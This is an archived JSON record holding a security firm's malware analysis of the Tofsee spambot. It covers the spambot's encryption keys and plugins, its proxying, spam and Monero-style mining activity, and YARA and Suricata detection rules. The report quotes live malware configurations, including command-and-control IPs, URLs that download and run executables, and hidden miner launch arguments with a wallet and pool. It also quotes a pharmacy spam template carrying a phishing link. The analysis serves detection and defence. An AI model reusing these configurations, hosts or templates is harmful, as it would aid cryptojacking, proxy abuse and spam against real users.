{
	"id": "aedc086e-be91-45d9-8095-d69c018f9b8c",
	"created_at": "2026-04-06T00:10:48.388097Z",
	"updated_at": "2026-04-10T13:11:45.311671Z",
	"deleted_at": null,
	"sha1_hash": "bd4f2a3fefd4ae664df2429053d0bb5aacd4b54c",
	"title": "Tofsee Botnet: Proxying and Mining | Bitsight",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 813323,
	"plain_text": "Tofsee Botnet: Proxying and Mining | Bitsight\r\nBy Written by André Tavares Sr. Threat Researcher\r\nArchived: 2026-04-05 14:42:28 UTC\r\nBitsight has recently observed a 15-year-old modular spambot called Tofsee being distributed by PrivateLoader\r\n(ruzki), a notorious malware distribution service we also closely monitor. \r\nBitsight has noticed Tofsee engaging in web traffic proxying, with a small percentage of it being email spam related\r\ntraffic, and also performing cryptocurrency mining.\r\nBitsight's partial visibility over its botnet of infected machines suggests that its spread worldwide, with a significant\r\npercentage of infections in India.\r\nIn January 2023, PrivateLoader, a malware loader from a pay-per-install malware distribution service called “ruzki”, started\r\nto distribute Tofsee (a.k.a. Gheg), a modular spambot. Spambots are typically utilized by cybercriminals to spread malware\r\nand phishing emails, and this particular one has been in operation since at least 2008. Due to its modular architecture, Tofsee\r\nis capable of performing a wide range of tasks once it receives instructions to do so (as it did in the past), such as denial of\r\nservice attacks and click fraud. The samples are packed but can be easily unpacked. Unpacking denotes the last stage in\r\nwhich the main functionality of the malicious software is exposed. Threat Actors make use of packers when distributing\r\ntheir malware as they remain an effective way to evade detection.\r\nAs revealed by CERT.pl, the malware downloads two types of resources (updates) from its command-and-control (C2)\r\nserver: configurations, and plugins to extend its functionality. After trying to decrypt the packet capture from a sandbox run\r\nof the sample to understand what resources have recently been fetched, we were getting high entropy data, signaling that\r\nsomething on the protocol may have changed. One of the first guesses was that the hardcoded 7-byte-lowercase-only-letters\r\nencryption key “abcdefg” might have changed.\r\nTo understand if that was the case, we tried to search for the key on the binary, but couldn’t find it. Going deeper, statically\r\nanalyzing the sample using a disassembler, right on the main function, one of the first functions called (Fig. 1) looks like a\r\nstring decryption function and is called 67 times throughout the code. After implementing it in python and testing one of the\r\ncalls to it, a plaintext string is indeed returned.\r\nhttps://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining\r\nPage 1 of 10\n\nFigure 1 - Tofsee string decryption function.\r\nAfter a while looking through the binary, trying to find code related to the communication protocol, eventually we found and\r\ndecrypted another 7-byte-lowercase-only-letters string, “qazwsxed”. This one gives low entropy data (many null bytes for\r\nexample). With this knowledge, we could decrypt 28 resources downloaded by the malware once it starts running (Table 1).\r\nSome resources were compressed and so we had to find and reverse the decompression algorithm used.\r\nConfigs Plugins\r\nblist_cfg\r\nblist_doms\r\nblist_ips\r\nID4011378458\r\nminer_cfg\r\nport_cfg\r\npriority\r\nproxy_cfg\r\nps_otlups_hm\r\nps_otlups_ya\r\npsmtp_cfg\r\nRT_1\r\nRT_2\r\nRT_AD\r\nsmtp_ban\r\nsmtp_herr\r\nsmtp_retr\r\nstart_srv\r\nsys_cfg\r\nblist.dll (Am I blocklisted?)\r\nminer.dll\r\nsys.dll (updater)\r\nproxyR.dll\r\nsmtp.dll\r\ntext.dll (process email templates)\r\nxmrcpu.exe\r\nhttps://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining\r\nPage 2 of 10\n\ntime_cfg\r\nwork_srv\r\nTable 1 - Resources downloaded by Tofsee.\r\nThe “proxyR” and “miner” plugins were the only ones that had network activity. The “smtp” plugin needs extra\r\nconfigurations to be able to generate and send spam, specifically resources of type 7 (general purpose macros), 8 (local\r\nmacros), and 11 (template scripts), which we never encountered in a two month period.\r\nRegarding the proxy plugin, we extracted a configuration payload (Code 1) with 6 IPs located in Russia. Looking at the\r\nsame packet capture previously mentioned, after trying to decrypt the TCP streams related to those IPs, we were again\r\ngetting high entropy data. Looking at the proxy plugin DLL, there is yet another 7-byte-lowercase-only-letters string,\r\n“prcbsrv”. After decrypting the packets with it, the streams revealed HTTP(S) and SOCKS(4/5) requests sent from those IPs\r\nto the bot, which leads us to believe those are addresses of backconnect servers. A backconnect proxy server is a server that\r\nutilizes a pool of proxies (in this case, the Tofsee botnet) to perform requests on behalf of the user.\r\nversion 8\r\nclient.timeout_connect 30\r\nclient.timeout_read 60\r\nclient.timeout_write 60\r\nserver.sleep_connect 30\r\nserver.timeout_connect 30\r\nserver.timeout_read 60\r\nserver.timeout_write 60\r\ntarget.timeout_connect 30\r\ntarget.timeout_read 60\r\ntarget.timeout_write 60\r\nALL.max_threads 32\r\nALL.min_threads 1\r\nALL.num_services 6\r\nALL.percent_of_online 100\r\nALL.release_unused_thr_after 60\r\nALL.service00 176.113.115.239:416/16\r\nALL.service01 176.113.115.154:416/16\r\nALL.service02 176.113.115.155:416/16\r\nALL.service03 80.66.75.4:416/16\r\nALL.service04 176.113.115.135:416/16\r\nALL.service05 176.113.115.136:416/16\r\nCode 1 - Configuration for the proxy plugin (proxy_cfg).\r\nMost of the traffic is over HTTPS to popular websites, including several Russian ones. Figure 2 lists the top hostnames\r\ncontacted by the bot.\r\nhttps://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining\r\nPage 3 of 10\n\n---\nmeta-viewport: width=device-width\n---\nFigure 2 - Most requested HOST:PORT pairs.\nWhile looking through the traffic, we spotted an interesting pattern. Around 3% of the requests were HTTP POST with the\nURI ending in “.php” and, in many cases, starting with “/wp-”, to random websites that appear legitimate. Each request’s\npayload starts with the string “ce=” followed by a base64-encoded spam template (similar to Code 2). The response to the\nrequest usually was a 200 OK with “*send:ok*” as payload. These indicators lead us to believe that these (apparently)\nlegitimate websites have been likely compromised to be used to distribute spam.\nem=@aol.com,@icloud.com,@hotmail.com,@yahoo.com,\n@micromedint.com,@hotmail.com,@yahoo.com.hk,\n@hotmail.com,@sfr.fr,@msn.com,@yahoo.com,\n@yahoo.com,@comcast.net,@aol.com,@sfr.fr,\n@yahoo.fr,@yahoo.com,@msn.com,@aol.com,\n@hotmail.com,@gmail.com,@yahoo.com,@comcast.net,\n@aol.com,@hotmail.com,@yahoo.com,@hotmail.fr,\n@hotmail.com,@hotmail.com,@hotmail.com,@sfr.fr,\n@free.fr,@hotmail.com,@hotmail.com,@hotmail.com,\n@yahoo.com,@hotmail.com,@comcast.net,@libero.it,\n@hotmail.it,@sunrise.ch,@aol.com,@hotmail.com,\n@hotmail.it,@hotmail.com,@hotmail.co.uk,@hotmail.com,\n@aol.com,@bellsouth.net,@yahoo.com,@hotmail.com,\n@gmail.com,@yahoo.com,@aol.com,@orange.fr,\n@gmail.com,@yahoo.com,@yahoo.com,@aol.com,\n@fuse.net,@aol.com,@olguin.cc,@hotmail.fr,\n@aol.com,@live.com,@yahoo.co.uk,@planet.nl,\n@aol.com,@aol.com,@aol.com,@yahoo.com,\n@yahoo.com,@att.net,@yahoo.com,@gmail.com,\n@gmx.de,@aol.com,@hotmail.com,@gmail.com,\n@hotmail.com,@yahoo.com\u0026s=Product of the day\u0026f={rand:24x7 Pharmacy|Pharmacy\n24x7|Pharmacy USA|USA Pharmacy} - {rand:Final Price|Super Deals|Best Deals|Discounter}\u0026sn=1\u0026rpt=\u0026tp=1\u0026m=\n\nGood morning. How are you my dear.\n\nhttps://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining\nPage 4 of 10\n\nNoone will stay indifferent! Get Dream's Pills here.\n\n[CLICK HERE TO ORDER NOW](https://ajwhvdhk.page.link/NiG75YhjQHn1sYXXA) Code 2 - Spam template sent to a (most likely) compromised website.\nAnother 3% of the traffic was SMTP(S) spam traffic which can be categorized as \"romance scam\" or \"dating scam”, which\nincluded photo attachments of the supposed sender. In short, all spam activity was done exclusively through the proxy\nmodule. Regarding the “smtp” plugin, although it’s still being sent to the bots, we haven’t seen any activity from it so far.\nRegarding the miner plugin, we extracted a configuration payload (Code 3) containing some URLs. None seem to work,\nexcept “fastpool.xyz”, and the references for them on Google are old.\nversion 12\ndownload_period 100\nneedmacrs $xmrcpu\nkills cores_gt_1\ntasks cores_gt_1\ngrabb.download_id 9\ngrabb.ifs\ngrabb.size_min 200000\ngrabb.size_max 350000\ngrabb.run $grabb\ngrabb.flags NORMAL_PRIORITY_CLASS CREATE_NO_WINDOW\ngrabb.next_success\ngrabb.next_error\ngrabb.next_conditions\nlitecoin.download_id 9\nlitecoin.ifs\nlitecoin.urls http://103.15.106.221/rnm226.php;http://188.190.114.21/rnm226.php;http://111.121.193.238/rnm238.php\nlitecoin.path %USERPROFILE%\\%RND_char[4-6].exe\nlitecoin.size_min 200000\nlitecoin.size_max 350000\nlitecoin.run\nlitecoin.flags NORMAL_PRIORITY_CLASS CREATE_NO_WINDOW\ncores_gt_1.ifs COND_CORES_GT_1\ncores_gt_1.path svchost.exe\ncores_gt_1.size_min 200000\ncores_gt_1.size_max 4000000\nhttps://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining\nPage 5 of 10\n\ncores_gt_1.run $xmrcpu\r\ncores_gt_1.args -o fastpool.xyz:10060 -u\r\n9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tm\r\n-p x -k -a cn/half\r\ncores_gt_1.flags NORMAL_PRIORITY_CLASS CREATE_NO_WINDOW\r\ncores_gt_1.next_success\r\ncores_gt_1.next_error\r\ncores_gt_1.next_conditions\r\none_core.ifs\r\none_core.url http://130.185.108.137/pchfv.php\r\none_core.path %USERPROFILE%\\do.exe\r\none_core.size 223744\r\none_core.run \"%USERPROFILE%\\do.exe\" %MINER_LOGIN2 -g yes -t 1 -w 300\r\none_core.flags BELOW_NORMAL_PRIORITY_CLASS CREATE_NO_WINDOW\r\nCode 3 - Configuration for the miner plugin (miner_cfg).\r\nMoreover, there’s only activity to “fastpool.xyz:10060”, which is a mining pool for Masari (MSR), a privacy-focused\r\ncryptocurrency that aims to provide secure, private, and untraceable transactions (Fig. 3)\r\nFigure 3 - MSR mining pool documentation\r\nThe mining pool website has some statistics on the botnet’s mining work (Fig. 4). In total so far, to this address, Tofsee\r\nbotnet was able to mine ~200 000 MSR, which currently corresponds to ~1500$. By searching for the wallet address on\r\nGoogle, the first reference is from June 2022.\r\nhttps://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining\r\nPage 6 of 10\n\nFigure 4 - MSR mining pool documentation\r\n \r\nBitsight's partial visibility over the geographical distribution of the Tofsee botnet in March 2023 suggests that it’s present\r\nworldwide, with a significant percentage of infections in India (33%), as Figure 5 shows.\r\nFigure 5 - Approximation of Tofsee botnet distribution in March 2023.\r\nThe data used to populate this map is sampled, which means that the actual geographical distribution of Tofsee may be\r\ncloser to this one but not exactly what this map suggests.\r\nTofsee remains a persistent threat to organizations worldwide, with its primary focus recently being the proxying of web\r\ntraffic and cryptocurrency mining. However, its modular design also allows for it to be used for a variety of other malicious\r\nactivities, including spam campaigns and distributed denial of service (DDoS) attacks, as seen in the past. As such, it is\r\ncrucial for organizations to remain vigilant in their cybersecurity efforts and take steps to mitigate the risk of Tofsee\r\nhttps://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining\r\nPage 7 of 10\n\ninfection. Bitsight will continue to monitor the threat landscape closely and provide updates on new developments related to\r\nTofsee and other emerging threats.\r\nAll indicators of compromise and detection signatures can be found here.\r\nTofsee malware/bot/core sample unpacked:\r\n96baba74a907890b995f23c7db21568f7bfb5dbf417ed90ca311482b99702b72\r\nYARA rule:\r\nThe unpacked binary contains a lot of interesting plaintext strings that can be used to write a YARA rule to detect the\r\nmalware. This following 7-year-old rule that does the job well:\r\nrule win_tofsee\r\n{\r\nmeta:\r\nauthor = \"akrasuski1\"\r\npublished_at = \"https://gist.github.com/akrasuski1/756ae39f96d2714087e6d7f252a95b19\"\r\nrevision_by = \"andretavare5\"\r\ndescription = \"Tofsee malware\"\r\norg = \"BitSight\"\r\ndate = \"2023-03-24\"\r\nmd5 = \"92e466525e810b79ae23eac344a52027\"\r\nreference = \"https://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining\"\r\nlicense = \"CC BY-NC-SA 4.0\"\r\nstrings:\r\n$decryptStr = {32 55 14 88 10 8A D1 02 55 18 F6 D9 00 55 14}\r\n$xorGreet = {C1 EB 03 C0 E1 05 0A D9 32 DA 34 C6 88 1E}\r\n$xorCrypt = {F7 FB 8A 44 0A 04 30 06 FF 41 0C}\r\n$string_res1 = \"loader_id\"\r\n$string_res2 = \"born_date\"\r\n$string_res3 = \"work_srv\"\r\n$string_res4 = \"flags_upd\"\r\n$string_res5 = \"lid_file_upd\"\r\n$string_res6 = \"localcfg\"\r\n$string_var0 = \"%RND_NUM\"\r\n$string_var1 = \"%SYS_JR\"\r\n$string_var2 = \"%SYS_N\"\r\n$string_var3 = \"%SYS_RN\"\r\nhttps://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining\r\nPage 8 of 10\n\n$string_var4 = \"%RND_SPACE\"\r\n$string_var5 = \"%RND_DIGIT\"\r\n$string_var6 = \"%RND_HEX\"\r\n$string_var7 = \"%RND_hex\"\r\n$string_var8 = \"%RND_char\"\r\n$string_var9 = \"%RND_CHAR\"\r\ncondition:\r\n(7 of ($string_var*)\r\nand 4 of ($string_res*))\r\nor (7 of ($string_var*)\r\nand 2 of ($decryptStr, $xorGreet, $xorCrypt))\r\nor (4 of ($string_res*)\r\nand 2 of ($decryptStr, $xorGreet, $xorCrypt))\r\n}\r\nString decryption function in Python:\r\ndef decrypt(enc_str, key1, key2):\r\nout = []\r\nfor i in range(len(enc_str)):\r\nout.append(key1 ^ enc_str[i])\r\nif i % 2:\r\nkey1 = (key1 + key2 - 1) \u0026 0xFF\r\nelse:\r\nkey1 = (key1 + key2 + 1) \u0026 0xFF\r\nreturn bytes(out)\r\nenc_str = bytes.fromhex('B1FE316F549FDB1B6DA1F17D')\r\nkey1 = 0xE4\r\nkey2 = 0xC8\r\nprint(decrypt(enc_str, key1, key2))\r\n# \u003e\u003e\u003e b'USERPROFILE\\x00'\r\nSuricata rule:\r\nThe following suricata rules detect the malware communicating with its C2 server:\r\nhttps://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining\r\nPage 9 of 10\n\nalert tcp $EXTERNAL_NET any -\u003e $HOME_NET any ( msg:\"BitSight MALWARE Possible Tofsee Server Hello\";\r\nflow:established,from_server; dsize:200; flowbits:set,TOFSEE_C2_GREET; flowbits:noalert;\r\nreference:url,malpedia.caad.fkie.fraunhofer.de/details/win.tofsee; sid:2008025; rev:1;)\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any ( msg:\"BitSight MALWARE Tofsee Hello\";\r\nflow:established,from_client; dsize:125; flowbits:isset,TOFSEE_C2_GREET;\r\nreference:url,malpedia.caad.fkie.fraunhofer.de/details/win.tofsee; sid:2008026; rev:1;)\r\nSource: https://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining\r\nhttps://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining"
	],
	"report_names": [
		"tofsee-botnet-proxying-and-mining"
	],
	"threat_actors": [],
	"ts_created_at": 1775434248,
	"ts_updated_at": 1775826705,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bd4f2a3fefd4ae664df2429053d0bb5aacd4b54c.pdf",
		"text": "https://archive.orkl.eu/bd4f2a3fefd4ae664df2429053d0bb5aacd4b54c.txt",
		"img": "https://archive.orkl.eu/bd4f2a3fefd4ae664df2429053d0bb5aacd4b54c.jpg"
	}
}